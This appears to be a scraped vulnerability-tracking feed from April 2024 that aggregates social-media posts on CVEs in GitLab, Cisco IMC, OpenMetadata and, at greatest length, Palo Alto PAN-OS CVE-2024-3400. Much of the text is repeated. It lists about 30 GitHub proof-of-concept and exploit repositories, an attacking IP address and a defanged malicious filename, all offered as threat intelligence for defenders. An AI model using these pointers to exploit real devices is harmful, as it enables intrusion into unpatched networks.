In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##GitLab: GitLab Patch Release: 16.11.1, 16.10.4, 16.9.6
In case you missed it on Wednesday 24 April 2024, since I did. No mention of exploitation. GitLab Community Edition (CE) and Enterprise Edition (EE) versions 16.11.1, 16.10.4, 16.9.6 fix the following vulns:
#GitLab #PatchTuesday #vulnerability #CVE_2024_4024 #CVE_2024_2434 #CVE_2024_2829 #CVE_2024_4006 #CVE_2024_1347
##updated 2024-04-25T06:16:00.237000
2 posts
1 repos
Suggested Read: CVE-2024-3177 https://github.com/kubernetes/kubernetes/issues/124336 Kubernetes, K8s, InfoSec #devopsish
##Suggested Read: CVE-2024-3177 https://github.com/kubernetes/kubernetes/issues/124336 Kubernetes, K8s, InfoSec #devopsish
##updated 2024-04-24T21:32:04
2 posts
Cisco released 3 security advisories:
Please note that a proof of concept was publicly disclosed for CVE-2024-20295 before it was patched, making this a zero-day. The Cisco PSIRT is not aware of any malicious use of the vulnerabilities that were described in these advisories. But don't take my word for it, go check them out yourself.
#Cisco #PatchTuesday #zeroday #proofofconcept #CVE_2024_20356 #CVE_2024_20373 #CVE_2024_20295
##Cisco zero-day (PoC publicly disclosed): Cisco Integrated Management Controller CLI Command Injection Vulnerability CVE-2024-20295 (8.8 high) 🔗 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-cmd-inj-mUx4c5AJ
A vulnerability in the CLI of the Cisco Integrated Management Controller (IMC) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have read-only or higher privileges on an affected device.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.
The Cisco PSIRT is aware that proof-of-concept exploit code is available for the vulnerability that is described in this advisory.
#zeroday #proofofconcept #vulnerability #Cisco #vulnerability #CVE_2024_20295
##updated 2024-04-24T21:31:56
11 posts
1 repos
IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :
✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !
𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?
(constat: ces "appliances" sont de vrais 🧀 )
👇
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
"Jailbreaking a Cisco appliance to run DOOM"
##Researchers at Nettitude Labs have published a write-up and PoC for CVE-2024-20356.
This is a command injection vulnerability in the web interface of the Cisco IMC servers that can be used by authenticated attackers to gain root privileges on the device.
Nettitude used the bug to install and play DOOM on the device. Cisco patched the vulnerability last week.
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##CVE-2024-20356: Jailbreaking a #Cisco appliance to run DOOM #ciscown
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##@foone
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
IMO on tient ici un des plus beaux descriptifs/blog post technique de l'année sur l'exploitation de la vulnérabilité CVE-2024-20356 (web-GUI Cisco IMC ) :
✅ Complet
✅ Précis
🛠️ Toolkit disponible sur GitHub
😄 ...et amusant !
𝕮𝖆𝖓 𝖎𝖙 𝖗𝖚𝖓 𝕯𝖔𝖔𝖒?
(constat: ces "appliances" sont de vrais 🧀 )
👇
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
"Jailbreaking a Cisco appliance to run DOOM"
##Researchers at Nettitude Labs have published a write-up and PoC for CVE-2024-20356.
This is a command injection vulnerability in the web interface of the Cisco IMC servers that can be used by authenticated attackers to gain root privileges on the device.
Nettitude used the bug to install and play DOOM on the device. Cisco patched the vulnerability last week.
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##CVE-2024-20356: Jailbreaking a #Cisco appliance to run DOOM #ciscown
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
##@foone
https://labs.nettitude.com/blog/cve-2024-20356-jailbreaking-a-cisco-appliance-to-run-doom/
Cisco released 3 security advisories:
Please note that a proof of concept was publicly disclosed for CVE-2024-20295 before it was patched, making this a zero-day. The Cisco PSIRT is not aware of any malicious use of the vulnerabilities that were described in these advisories. But don't take my word for it, go check them out yourself.
#Cisco #PatchTuesday #zeroday #proofofconcept #CVE_2024_20356 #CVE_2024_20373 #CVE_2024_20295
##updated 2024-04-24T17:06:02
1 posts
Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC
##updated 2024-04-24T17:06:01
1 posts
Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC
##updated 2024-04-24T16:15:08.880000
2 posts
Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?
This would greatly simplify parsing for https://github.com/cve-search/vulnerability-lookup and many other tools.
#cve #vulnerability #opensource #opendata
Sample one: https://vulnerability.circl.lu/vuln/cve-2024-2957
##Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?
This would greatly simplify parsing for https://github.com/cve-search/vulnerability-lookup and many other tools.
#cve #vulnerability #opensource #opendata
Sample one: https://vulnerability.circl.lu/vuln/cve-2024-2957
##updated 2024-04-24T14:34:35
1 posts
Microsoft reports that financially motivated attackers are exploiting several OpenMetadata vulnerabilities to gain access to Kubernetes workloads for cryptomining activity. CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, CVE-2024-28254 could be exploited by attackers to bypass authentication and achieve remote code execution. "Since the beginning of April, we have observed exploitation of this vulnerability in Kubernetes environments." Microsoft describes the attack flow and provides IOC 🔗 https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
#threatintel #eitw #OpenMetadata #activeexploitation #CVE_2024_28255 #CVE_2024_28847 #CVE_2024_28253 #CVE_2024_28848 #CVE_2024_28254 #IOC
##updated 2024-04-23T19:57:25.207000
84 posts
33 repos
https://github.com/terminalJunki3/CVE-2024-3400-Checker
https://github.com/retkoussa/CVE-2024-3400
https://github.com/Kr0ff/cve-2024-3400
https://github.com/momika233/CVE-2024-3400
https://github.com/HackingLZ/panrapidcheck
https://github.com/codeblueprint/CVE-2024-3400
https://github.com/marconesler/CVE-2024-3400
https://github.com/0x0d3ad/CVE-2024-3400
https://github.com/Chocapikk/CVE-2024-3400
https://github.com/LoanVitor/CVE-2024-3400-
https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker
https://github.com/stronglier/CVE-2024-3400
https://github.com/Ravaan21/CVE-2024-3400
https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan
https://github.com/Yuvvi01/CVE-2024-3400
https://github.com/swaybs/CVE-2024-3400
https://github.com/index2014/CVE-2024-3400-Checker
https://github.com/h4x0r-dz/CVE-2024-3400
https://github.com/hahasagined/CVE-2024-3400
https://github.com/schooldropout1337/CVE-2024-3400
https://github.com/ihebski/CVE-2024-3400
https://github.com/phantomradar/cve-2024-3400-poc
https://github.com/CerTusHack/CVE-2024-3400-PoC
https://github.com/FoxyProxys/CVE-2024-3400
https://github.com/CONDITIONBLACK/CVE-2024-3400-POC
https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection
https://github.com/MrR0b0t19/CVE-2024-3400
https://github.com/sxyrxyy/CVE-2024-3400-Check
https://github.com/ZephrFish/CVE-2024-3400-Canary
https://github.com/ak1t4/CVE-2024-3400
https://github.com/pwnj0hn/CVE-2024-3400
Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 https://www.ncsc.gov.uk/news/exploitation-palo-alto-globalprotect-gateway-vulnerability
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 https://www.bleepingcomputer.com/news/security/22-500-palo-alto-firewalls-possibly-vulnerable-to-ongoing-attacks/
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev
##Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js
##TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 https://www.bleepingcomputer.com/news/security/22-500-palo-alto-firewalls-possibly-vulnerable-to-ongoing-attacks/
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev
##Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js
##TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##The #golang `gorilla/sessions` directory traversal and file (over)write is now being tracked as GO-2024-2730: https://go-review.googlesource.com/c/vulndb/+/579655
This issue was (co)-discovered as part of watchTowr's analysis of the Palo Alto Networks RCE (#CVE_2024_3400), but is entirely separate, and affects a wide range of Go-based web services.
https://github.com/golang/vulndb/issues/2730
If you use gorilla/sessions with the FilesystemStore, please switch to the CookieStore instead until a patch is available.
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Freshly updated list of very, very expensive toilet paper providers:
https://www.paloaltonetworks.com/legal-notices/trust-center/tech-certs
#PaloAlto #cve20243400 #CVE-2024-3400 #SecurityTheater
##Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400
Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.
Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.
Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.
For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.
##Full Rapid7 technical analysis of Palo Alto Networks #cve20243400 via @stephenfewer and new vuln research teammate @fuzz 🤩 Spoiler: Two vulns, one exploit! https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Freshly updated list of very, very expensive toilet paper providers:
https://www.paloaltonetworks.com/legal-notices/trust-center/tech-certs
#PaloAlto #cve20243400 #CVE-2024-3400 #SecurityTheater
##Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400
Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.
Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.
Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.
For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.
##Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##You'd expect a government advisory to contain timely and reliable information. NCSC-UK warned about CVE-2024-3400 ten days after infosec publications broke the news. This advisory was difficult to locate even on their homepage. They only mention Unit 42 and Palo Alto Networks' blogs, not Volexity's. Nothing about indicators of compromise either. Their mitigation section sounds as though all available hotfixes weren't released already (they were). The only noteworthy statement is that "Palo Alto Networks is aware of increasing exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties."🔗 https://www.ncsc.gov.uk/news/exploitation-palo-alto-globalprotect-gateway-vulnerability
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 https://www.bleepingcomputer.com/news/security/22-500-palo-alto-firewalls-possibly-vulnerable-to-ongoing-attacks/
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev
##Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js
##TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##Palo Alto Networks updated their security advisory for CVE-2024-3400:
We are also aware of proof-of-concept by third parties of post-exploit persistence techniques that survive resets and upgrades. We are not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.
This renders their Remediation Guide moot as their recommended action for "Level 3 interactive access" is Update to the latest PAN-OS hotfix and perform a Factory Reset.
Waiting for them to update the KB article to recommend disconnecting the PAN-OS and yeeting it into the sun. 🌞cc: @todb
#CVE_2024_3400 #PaloAltoNetworks #eitw #activeexploitation #proofofconcept #poc #DFIR
##Palto Alto Networks: How to Remedy CVE-2024-3400
So Palo Alto Networks has an actual remediation (read: incident response) knowledge base article for CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 as an exploited zero-day), "based on the current view of the most effective and least disruptive remediation for customers." Their guidance is simple:
It's implied that the threat actor would move laterally from the compromised device and establish persistence (additional backdoors, etc.) so threat hunting and containment should be prioritized.
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #DFIR
##Hold onto your Industrial Control Systems! Security Week reports that Siemens Ruggedcom APE1808 configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). "Siemens is preparing updates and recommends specific countermeasures for products where updates are not, or not yet available. Customers are advised to consult and implement the workarounds provided in Palo Alto Networks' upstream security notifications." 🔗 https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/ and advisory https://cert-portal.siemens.com/productcert/html/ssa-750274.html
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #Siemens #ICS
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Palo Alto Networks released additional details about CVE-2024-3400: the fact that it is a combination of two bugs in PAN-OS; how an attacker was exploiting it; how disabling telemetry initially worked; and how they fixed it. The timeline from discovery to remediation encompasses the whole blog post. Overall a comprehensive after-action review from a company that notified the public almost immediately of an exploited zero-day. 🔗https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #PANOS #IOC
##Bleeping Computer: GreyNoise and ShadowServer Foundation are reporting active exploitation of CVE-2024-3400 (10.0 critical, disclosed 12 April 2024 by Palo Alto Networks as an exploited zero-day, OS Command Injection Vulnerability in GlobalProtect Gateway, added to CISA KEV Catalog, has Proof of Concept). The good news is that all hotfixes for vulnerable versions of PAN-OS are now released. 🔗 https://www.bleepingcomputer.com/news/security/22-500-palo-alto-firewalls-possibly-vulnerable-to-ongoing-attacks/
#CVE_2024_3400 #PaloAltoNetworks #activeexploitation #eitw #kev
##Zscaler observed exploitation of the Palo Alto Networks PAN-OS command injection zero-day vulnerability CVE-2024-3400 following the release of the PoC exploit code. Zscaler provides an attack flow diagram, and a technical analysis of the Upstyle backdoor and its layers. IOC provided. 🔗 https://www.zscaler.com/blogs/security-research/look-cve-2024-3400-activity-and-upstyle-backdoor-technical-analysis
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##Way to live up to the stereotypes, nerds. PAN GlobalProtect exploit attempts using jsquery[.]sex[.]js instead of jsquery[.]max[.]js
##TrustedSec CTO Justin Elze shared CVE-2024-3400 exploit in the wild on Twitter yesterday, reports that 149.28.194.95 was attempting to exploit CVE-2024-3400
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept #threatintel #IOC
##The #golang `gorilla/sessions` directory traversal and file (over)write is now being tracked as GO-2024-2730: https://go-review.googlesource.com/c/vulndb/+/579655
This issue was (co)-discovered as part of watchTowr's analysis of the Palo Alto Networks RCE (#CVE_2024_3400), but is entirely separate, and affects a wide range of Go-based web services.
https://github.com/golang/vulndb/issues/2730
If you use gorilla/sessions with the FilesystemStore, please switch to the CookieStore instead until a patch is available.
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
